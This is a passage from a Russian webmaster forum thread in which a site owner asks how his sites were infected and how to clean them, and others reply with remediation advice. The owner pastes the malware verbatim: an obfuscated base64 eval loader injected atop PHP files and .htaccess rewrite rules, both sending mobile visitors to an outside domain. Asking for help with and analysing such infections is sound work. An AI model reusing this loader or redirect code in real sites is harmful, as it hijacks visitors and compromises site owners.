- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи
И выявили более 7 млн подозрительных пользователей
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
По запросу в поисковиках такого кода не нашел.
Вот это прописывается в начале PHP-файлов на всех сайтах, в независимости от движка:
$_ = strrev('tressa'); @$_("e\166\141\154\050b\141\163\145\066\064\137\144\145\143\157\144\145\050'aWYgKChwcmVnX21hdGNoKCcvdGV4dFwvdm5kLndhcC53bWx8YXBwbGljYXRpb25cL3ZuZC53YXAueGh0bWxcK3htbC9zaScsIEAkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkgfHwgcHJlZ19tYXRjaCgnL2FsY2F0ZWx8YW1vaXxhbmRyb2lkfGF2YW50Z298YmxhY2tiZXJyeXxiZW5xfGNlbGx8Y3JpY2tldHxkb2NvbW98ZWxhaW5lfGh0Y3xpZW1vYmlsZXxpcGhvbmV8aXBhZHxpcGFxfGlwb2R8ajJtZXxqYXZhfG9wZXJhLm1pbml8bWlkcHxtbXB8bW9iaXxtb3Rvcm9sYXxuZWMtfG5va2lhfHBhbG18cGFuYXNvbmljfHBoaWxpcHN8cGhvbmV8c2FnZW18c2hhcnB8c2llLXxzbWFydHBob25lfHNvbnl8c3ltYmlhbnx0LW1vYmlsZXx0ZWx1c3x1cFwuYnJvd3Nlcnx1cFwubGlua3x2b2RhZm9uZXx3YXB8d2Vib3N8d2lyZWxlc3N8eGRhfHhvb218enRlL3NpJywgQCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgcHJlZ19tYXRjaCgnL21zZWFyY2h8bVw/cT0vc2knLCBAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkgJiYgIXByZWdfbWF0Y2goJy9tYWNpbnRvc2h8YW1lcmljYXxhdmFudHxkb3dubG9hZHx3aW5kb3dzXC1tZWRpYVwtcGxheWVyfHlhbmRleHxnb29nbGUvc2knLCBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgeyBlY2hvICc8c2NyaXB0IHNyYz0iaHR0cDovL21vYmlsZS1jb250ZW50LmluZm8vanF1ZXJ5LTEuNy4xLmpzIj48L3NjcmlwdD4nOyBmbHVzaCgpOyBleGl0OyB9'\051\051\073");
?>
Кроме этого, в файле .htaccess прописана эта мура:
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://mobile-content.info/direct.php [L,R=302]
Как правило оба кода прописаны дважды, один под другим, как будто файлы дважды подверглись заражению.
Зараженные сайты работают как обычно, но если зайти на них с мобильного, то редиректят на несколько доменов.
Вычистить код, это понятно. Но откуда он берется? Где искать источник заразы и как его определить? Может софт какой-то посоветуете?
ЗЫ
Пока чищу .htaccess бесплатным сервисом http://www.virusdie.ru/index.php
Вроде получается. Но эта мера скорее временная. Источник заражения по-прежнему не найден.
ЗЗЫ
Из того, как я понял действие антивируса, он лечит последствия, но не причину. Он чистит только один файл - .htaccess,
лежащий в корне сайта и который редиректит мобильный трафик. Кроме того он присваивает ему chmod 400, что запрещает
его редактирование со стороны вируса. На этом действие антивируса заканчивается. В PHP-файлах по-прежнему прописанная
зараза никуда не исчезает. Просто теперь она не может редактировать файл .htaccess.
Как временная мера годится. Но причину заражения нужно искать. Прошу дельных советов, как ее найти.
Обратись к сисадминку, он почистит сервер от вирусов. Это недорого.
почистить код и почистить htaccess
сменить пароли к фтп. скорее всего так и был получен доступ
если используется cms - обновить
/ru/forum/750962
ТС, надо бороться не со следствием, а с причиной(-ами).
http://www.revisium.com/ai/ - для начала. Если не поможет, обращайтесь к спецам.
Самые частые причины:
1) Сперли пароли, залили шелл, либо скрипт, при обращении к которому проверяется ХТАЦЦЕСС, и ежели Вы его почистили, то туда снова записывается то, что нужно хацкерам.
2) Просто залили шелл через дыру(как правило это корявые плагины для паблик ЦМС).
Отлично, что нашел эту проблему. Расскажу про свою борьбу с этим вирусом.
Заметил где-то в июле, и то далеко не сразу. У меня хостинг агагва, и мне просто позвонили, сказали что сайт упал(не из агавы, а подруга).
Оказалось из за-того, что права в папке с скриптами поменяли на 0777.
Со временем такая хрень происходила, сам нашел выше указаный текст, удалили, надеялся, что помогло.
Но потом продолжалась такая хрень. Думал, что вирус не отрабатывает полностью, просто права переделывает и где-то сбивается.
Потом обнаружил, что заходя с телефона, идет редирект на подозрительный сайт.
Пробовал оставлять index.php состоящий из текста Hello world. Все равно директ происходит. Начал думать, что с моим телефоном, что-то не то.
Теперь почти уверен, что косяк на уровне настроек сервера. На днях буду обращаться в поддержку.
была такая же хрень боролся очень просто 444 на .htaccess ну и поиск шеллов на сайте, искать довольно просто ставим сайт на закачку любым фтп клиентом и смотрим на какие файлы материться антивирус, записываем названия файлов и пути и потом смотрим более детально.
Таким образом уже где-то пару месяцев ничего не подхватываю.
Новая хрень.
Пишет в хтаццесс вот это:
Эффект потрясающий. Ошибка сервера 500
Сижу, вручную чищу все свои сайты. Буду нанимать спеца, чтоб закрыл дыры.
ТС проблема ваша не решается путем замены или установки прав, необходимо проверять сайты на наличие вредоносных кодов.
Если сами не справитесь стучите, проверим сайты на вирусы + дадим рекомендации!
php_value error_reporting "E_ALL ^ E_WARNING ^ E_NOTICE" RewriteEngine on
не похоже на вирус, если честно..
не похоже на вирус, если честно..
Почему? Бывают же вирусы вредители. Создаются просто чтобы навредить и никакой выгоды автор вируса не получает.